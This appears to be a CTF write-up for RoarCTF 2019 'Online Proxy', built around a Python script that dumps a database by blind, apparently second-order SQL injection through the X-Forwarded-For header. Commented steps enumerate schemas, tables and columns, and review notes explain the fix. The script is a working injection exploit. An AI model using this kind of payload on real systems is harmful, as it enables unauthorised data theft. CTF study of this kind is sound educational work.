[RoarCTF 2019]Online Proxy

[RoarCTF 2019]Online Proxy

恶心坏了111

import requests
# Base URL of the CTF challenge instance; exe_sql() sends every probe request here.
url = "http://node3.buuoj.cn:27220/"
def exe_sql(sql_str):
    """Read the result of ``sql_str`` one character at a time via a boolean oracle.

    For each character position a binary search over the codes 32..127 is
    run. Every probe opens a fresh session and sends three GET requests: the
    first carries the comparison in ``X-Forwarded-For``, the next two carry
    the fixed value ``233``, and only the third response is checked for the
    marker ``"Last Ip: 1 "``. The growing result is printed after each
    character; nothing is returned.

    NOTE(review): the three-request sequence suggests the header value is
    stored by one request and re-used inside a later query (second-order
    injection) -- inferred from the request pattern, not visible in this
    file. The server-side fix is to bind the stored value as a query
    parameter wherever it is read back, and not to treat the client-supplied
    ``X-Forwarded-For`` as a trusted address.
    """
    extracted = ""
    position = 0
    decoy_headers = {"X-Forwarded-For": "233"}
    while True:
        position += 1
        low, high = 32, 127
        while low < high:
            pivot = (low + high) // 2
            # The %-format applies to the trailing literal only; sql_str is
            # concatenated in unformatted.
            tail_part = "),%d,1))>%d or '0" % (position, pivot)
            probe_headers = {"X-Forwarded-For": "0'or ascii(substr((" + sql_str + tail_part}
            session = requests.Session()
            # Order matters: the probe value first, then the fixed value twice;
            # only the last response is inspected.
            for hdrs in (probe_headers, decoy_headers, decoy_headers):
                response = session.get(url, headers=hdrs)
            if "Last Ip: 1 " in response.text:
                low = pivot + 1
            else:
                high = pivot
        # A search that never moved off 32 is treated as end of data, so a
        # literal space in the result also ends the loop.
        if low == 32:
            break
        extracted += chr(low)
        print(extracted)
			
# Enumeration steps used in the write-up, one query per run. The trailing
# comment on each line records the value that run returned.
# Step 1: name of the current database.
#exe_sql("select database()")#ctf
# Step 2: all schema names visible to the application's database account.
#exe_sql("select group_concat(schema_name) from information_schema.schemata")#F4l9_D4t4B45e

# Step 3: tables in the current database.
#exe_sql("select group_concat(table_name) from information_schema.tables where table_schema=database()") #ip_log

# Step 4: tables in the second schema found in step 2.
# NOTE(review): the recorded outputs indicate the application account could
# read a schema other than its own; restricting that account to its own
# schema would have limited what this injection could reach.
#exe_sql("select group_concat(table_name) from information_schema.tables where table_schema='F4l9_D4t4B45e'")#F4l9_t4b1e
# Step 5: column names of that table (its result appears to be the
# F4l9_C01uMn noted on the next line).
#exe_sql("select group_concat(column_name) from information_schema.columns where table_schema='F4l9_D4t4B45e' and table_name='F4l9_t4b1e'")#
# Step 6 (the only live call): read the column's contents.
exe_sql("select group_concat(F4l9_C01uMn) from F4l9_D4t4B45e.F4l9_t4b1e")#F4l9_C01uMn

image-20200806003804417
